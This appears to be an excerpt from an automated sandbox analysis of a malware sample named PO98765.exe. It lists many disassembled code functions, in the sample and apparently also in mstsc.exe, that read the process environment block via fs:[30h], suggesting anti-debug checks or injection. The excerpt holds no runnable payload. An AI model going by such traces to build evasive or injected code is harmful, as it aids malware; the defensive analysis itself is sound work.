          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01503B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01503B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01564257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0151927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01514A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01514A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01513D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01553540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01583D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0155A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01588DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01501DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01501DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01501DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01508E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01518EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exe Code function: 1_2_015016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exe Code function: 1_2_0156FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exe Code function: 1_2_015546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exe Code function: 1_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exe Code function: 1_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exe Code function: 1_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05134D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05134D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05134D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0518A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05127D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05143D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05183540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05132581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05132581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05132581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05132581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05131DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05131DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05131DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051CFDE2 mov eax, dword ptr fs:[00000030h]
